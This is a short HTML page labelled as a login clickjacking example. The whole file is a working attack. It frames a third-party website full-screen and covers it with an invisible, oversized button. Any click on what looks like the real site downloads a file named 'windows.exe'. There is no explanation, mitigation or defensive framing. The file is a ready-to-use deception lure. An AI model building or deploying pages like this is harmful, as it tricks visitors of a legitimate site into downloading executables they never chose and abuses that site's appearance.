<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Clickjacking Example</title>
    <style>
        body, html {
            height: 100%;
            margin: 0;
        }
        iframe {
            width: 100%;
            height: 100%;
            position: absolute;
            top: 0;
            left: 0;
            z-index: 1;
            border: none;
        }
        div {
            position: absolute;
            top: 0;
            left: 50%;
            transform: translateX(-50%);
            z-index: 2;
        }
        button {
            padding: 10px 1920px;
            background-color: rgba(0, 0, 0, 0);
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div>
        <a href="./windows.exe" download>
            <button>LIVE</button>
        </a>
    </div>
    <iframe src="https://www.sekarlaut.com/"></iframe>
</body>
</html>

